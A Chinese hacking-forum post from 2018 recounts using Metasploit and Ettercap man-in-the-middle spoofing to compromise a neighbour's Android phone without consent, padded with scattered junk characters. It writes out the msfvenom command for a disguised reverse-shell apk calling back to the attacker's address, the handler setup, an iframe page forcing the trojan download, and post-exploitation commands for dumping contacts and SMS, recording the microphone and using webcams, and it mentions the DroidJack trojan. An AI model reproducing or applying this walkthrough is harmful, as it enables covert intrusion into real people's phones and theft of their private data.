找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1397|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式

9 T4 G" w6 {& |; ]* y" f$ S 五、msf+ettercap入侵邻居安卓手机 $ P3 v' c! G( o% q' \1 |

{/ k" C5 i- M/ {- j7 r7 R$ b6 c/ ]

/ [& _2 ^3 t8 v/ ]! C- u- n" g3 r 首先启动msf ; Z5 M3 _: N( X' o3 D

" E: X- n5 a9 d1 R' i9 v

7 v/ o, n2 W$ r4 s" T# Z/ q# P& d 先用kali生成一个安卓木马,如下命令: {# {: v( m0 G% s1 P J Q9 Y

# `, p6 C4 c8 V6 q. @% b U

( U M; ~ n* M; A2 D% D q# B" Y Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 0 N& S/ i D4 E/ t) D B

# v: p4 F2 [- _

; l- ?' W/ }0 [" ]; Z' P5 R 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ; y4 B- U* ^# }; m

' v% H7 _% n, N) I, y/ ]

! B+ t; N/ C4 r0 `' m3 X) @" j 然后进入msf 8 ]/ X! Q- Z0 J: M* [

, R3 s" S4 D, M- M9 W$ y U

$ T0 @) R% I4 _* e3 T use exploit/multi/handler . i8 I2 G- r, e) _4 V$ ?

7 B) T: w) K1 _( O! m8 e8 w- K

, R5 x' ]# R& Z5 _7 c4 n set payload android/meterpreter/reverse_tcp / O; R; \2 b+ l5 D( w" u0 V

2 Z& R' P" v2 G5 y

- V2 W0 B# A! N( s' ] set LHOST 192.168.0.109 //ipkailiip 0 L" d2 a9 f5 {2 m; B

0 H" E) Y2 D/ N+ Z% j- `* h

i5 b' m! }+ O- G* y- j set LPORT 44444 //端口一定要与前面生成的木马的端口一致 - S5 b; A. B+ L% c; f

, ?! [1 Q2 |0 \* O- c; V) X. q

# l7 P5 ]3 }8 l/ u! h% {; B Exploit 9 B1 L' K3 c! B, Y# j" ~/ m

) a! H# q8 U8 s2 k

8 Q) P0 o% h* z! Y8 N, N7 y1 t- g   # W6 j7 H, h1 n

3 V; |% G& f7 I" ?

- R0 Z: E* W' ~1 D5 [ 下面我们开启ettercap -G " N( o# e Z4 H6 h

, s/ ]! j% V3 C% t0 a4 `

3 e& o8 |; i/ b3 V" G$ @9 L 我物理IP " N0 E+ M2 u; _/ `- [, V1 K) \

6 ~% U6 Y# U% ~" u! w% O/ r

* U& d$ T9 \# w0 J   / r. N) ?5 w. b/ F5 A. M; `$ d

; A7 X9 ]8 a8 \. z- M. Z* S9 l

5 l7 a b: K! u 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 0 B3 c6 C. i( G6 y9 t, |+ h6 M. O- H

' C. ~9 @, l* `) C8 G* L' o# {

& Q8 F+ _. M" L- }, B! \7 A6 u$ g 下面我们来设置一下 * X, ^8 L) C/ L3 V

! F4 f8 c6 ~( C

2 U0 Z7 F0 ^7 [# k; P   ! u2 N; L' @; h4 a, W8 e2 o( c

6 E5 L# q' ?, p0 x! T" N4 e1 @% t3 a

0 j W: E; @* |3 J 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, - f" y2 ~, }$ `, [( G: M) {1 q

- _4 Q% A( f& j6 I" P7 U3 X, t1 u

0 S9 y9 e: e( z; `6 ^   " c; y# N$ K1 K$ J

* g2 S t3 v& p( A/ M/ v& {& Z

" Y; U' \ G( I* l6 X   ) r. V; x$ |7 I

K/ m5 t1 I5 {& p& A+ Y( Q; B

5 \6 n0 g7 l; {, S   , |2 U C/ j* ]( k* E p& v

( v! D$ l9 c5 l4 Z1 `% x

* c/ x% o6 q5 y) h# X   ; l6 R0 _/ n" v+ c0 f; U

) {0 U* u( j5 H% ~6 ?

. ^9 `8 k( M6 j5 }   $ f, l" l$ O3 x' I/ U3 K, Q

( c- \% X( P- @! V1 A7 a

: `6 V: p0 V' ]. M- M7 p   + x" v: k! `- }- S

! r1 m2 V' K0 Z' w

% q y' U4 z3 m' J R   & |- q! W& x0 d8 x s4 ?

: t7 i, w8 l# t S' F9 t7 T

; U1 f& m. ^9 S9 j0 q   ) \5 O9 l4 z; O3 e5 J6 l

1 k, [1 a0 }- `* d3 Q5 c

+ f7 I) Q& j* w9 Y& e* }% d9 x3 {- v   ) X4 B5 x& B5 d( B5 c

; q! t% U$ {! s

, [" O, F, h* a- @( k   - `& k& y4 E4 X+ \# I Z

9 y/ _4 w- s; L! R

+ C5 Q& _3 s( ~   - b- `3 g6 x( \: ?3 L

% Y: E/ T+ h& ^" c& l) k

" y4 O b! w3 r s7 j   ! i+ V5 c1 k& o, c

1 x3 T; {1 Q/ H% ~' \2 C x

3 W# f/ {% X9 a7 a6 i   3 l# E! E, ~. u2 K$ b+ h

3 t+ ]/ S* n5 I) H1 [) |, l

4 t7 z6 ?/ S2 G7 m& X 下面我们开始攻击 5 ?8 `( X3 x3 r, M( W, z, b0 P

. s5 j6 ^/ U( n3 r$ W

$ X3 n. Y. w* P   ) d U: R, u- i& S6 \

. N+ t2 Z3 y1 B' h4 O

) ~8 O9 y) J3 H; n" S   / T8 |+ Z& D0 E# \2 d$ T" f" b! |+ f; `

8 ?5 C i1 t8 \3 `1 g& P% C

M2 d H. k5 K F3 W   . p- M6 T1 [" H, B

1 c8 g# @% H/ r9 e# X+ f

/ b! q$ e$ R' Q   0 w4 \3 }! E0 j& B. p7 ~' J. v

: d4 u; \# f2 X: P f3 v) B. z

* ^$ |9 k3 {' i' }   - N7 t) L4 G9 r8 a8 P

4 h( a: e9 P, ~& [/ @ K& ~

* B) H. v" F$ y 大概过了5分钟多,发现反弹成功了 ( C# d9 n% ~% i" ~

; c9 S9 N' F6 a$ e1 ?* U

. c" D4 z. R# X! c n M   4 L4 x$ D" v6 \' n

' @7 D" f6 E+ p, A% J! B; q1 I

\3 x0 F: d$ o1 M4 \. A   $ z% N+ H$ G$ @1 T; B! G

0 c- H6 A4 D" N5 B; |

" s- z8 i6 i0 N! e0 v* m+ C/ m   & ^2 w3 W" j9 P5 N% {

$ x) _% R+ o& p$ I

# G/ R9 u" J- [! h   ! y' f. _% p& y' B

4 y) Y# |0 O1 R2 |

) J) o% B. Q; B/ L- o   - o+ \1 V9 ~6 B8 k7 k3 n

7 ? t6 @: F4 y

9 b* \1 \3 Y6 T2 _: J) Y9 n' C2 R   + B& S& I q& [1 f" s8 @

7 g. o, a% K, q; u

# |0 h. y& }% ?# p# [- _   0 T" D. j: H* K0 z0 o( V. Y

$ q( @) U1 d+ V9 s

2 M( `% L0 T% k( ?# L. p 执行命令 * u4 M7 b+ |' ]

9 R4 Y# m$ o. f- N& L

) @7 _' {$ Y5 D5 E. @   0 ]0 l) S3 y/ D& [

% s8 e9 d) f4 u( }

+ y1 L' X% b$ y" Y+ M dump_contacts    --》这个是导出电话 # W* m) G8 y) ~+ _5 d$ E

$ r+ X- v" \0 V9 r7 C) Z6 m

; t2 N# s" z% K. } dump_sms --》这个是导出信息 7 r: E# ^: E2 j+ f& y6 r

2 k7 N. c- O$ O- l9 o7 ^

V3 n. K+ g6 y6 R record_mic     Record audio from the default microphone for X seconds & K9 r5 K, r3 Y% f- `- c8 w

3 O+ Z! z9 F4 e8 S' X

( C3 S2 }; g _- e     webcam_chat    Start a video chat ) Q# \# g7 M" W8 ~9 r

3 @# ?/ [9 u% B( q6 X$ }

% I# d( k+ ]2 Y) C1 G     webcam_list    List webcams : q. t' E( F3 W; T9 K# m u, z0 F

Z" y q2 K+ G5 c

4 W- i6 L* r. L; c0 e5 z; v; C6 P6 ~     webcam_snap    Take a snapshot from the specified webcam # p( ]6 L6 u# x' V

+ g) s7 J$ w) Q( t

+ r# z! x" ~& c0 _' y webcam_stream  lay a video stream from the specified webcam ( t6 [1 t9 ?( G4 {; e

8 t: u& C5 \- \/ ~5 J" ?+ w# e8 y

& v- R" ~% e& g4 c0 i2 A3 Y% f/ l7 ?   # v4 l ?9 X& Q8 t; I7 n; Z7 o

% C& }' r( v* d1 H0 o# e# H

# V5 r0 e5 d" ?7 v8 O   % L7 y4 K6 H' C) ?; {

$ a) }' l2 q0 G1 h' ?1 Q( n+ g

! D9 Y; @' n5 g w; } 我们打开看一下电话薄, . Q6 z+ J: h2 r6 k

) p: k3 @. E& @9 m

% Z0 B1 v) o) L   , n5 r! ~4 W( C. C% h/ r/ ~

9 G6 @# v$ _" t. o+ k- T' G$ K

7 t3 O! G" l& V   ( B" U1 ~' `. A6 Z* `0 A

+ J; P- D4 V9 A/ M, f

( f0 T8 P/ G/ n M   - |$ ]; C( [+ H" Z. U* s

3 Z! X& ^- K6 q# E

) k: p- r, `# e* l. W7 L' C. |   1 |2 {6 [9 M1 |5 H! u9 ^

' W# Y" E, P% s! c

8 B3 |$ l' z, A' I6 Z- d( j   , M' y f4 J: r- \6 G1 `

9 D& n) Q' {9 ?0 k$ _

8 P* ^, [2 ?! Z1 O! o3 c   : b' Q" T- G& \4 T; s

- @- N: s3 I2 t4 t' k

: B- `/ {# @4 E U$ l" R+ E 我们同时欺骗成DroidJack木马,使用方法如图: $ L, w6 u, |: G8 \5 g# Q9 y7 V

5 y; [+ ` u, ~. f' w7 V" R

9 C' s) f0 r: o# c) Q& ?   * U0 j E0 O& o7 A- G

& P$ K1 ~& @8 x! H2 t( ?3 e3 C

" H6 i# B& n7 @" j R! V1 k   / O2 i2 m2 M- N

8 E2 Q$ |8 w4 c! x

% o+ b O# b! F" P+ Y5 R   % t# l! U; q! L: B# {/ F

. ]3 Y/ e# z$ ?1 C0 _# k

5 L# j7 v' U9 d: }: q 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 3 {( w5 \% o4 z' P5 a2 C6 q. K

9 y6 G4 z5 K: T/ N

0 O+ h( m5 H% c& @7 {) r   " D# t. h3 J- N. {8 o; q0 o

1 k! f8 E! ~4 d \; A

. Z6 T7 f4 i* j) V   / ^2 ]/ b3 Y& `8 t% g1 `8 m' n4 ?

2 z8 n0 j% V' }

5 Z0 E8 O5 k/ q   4 J. y, v. U6 U

1 ~+ q( H3 q( l4 v2 Q

5 J% T& F+ q5 T 1 z( M: {9 f, N" m

5 t$ p& O) D/ {3 Y4 w

, t1 S, P$ i$ g/ k' l
" U6 b4 e& w8 N0 Q! M) m8 p$ A

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表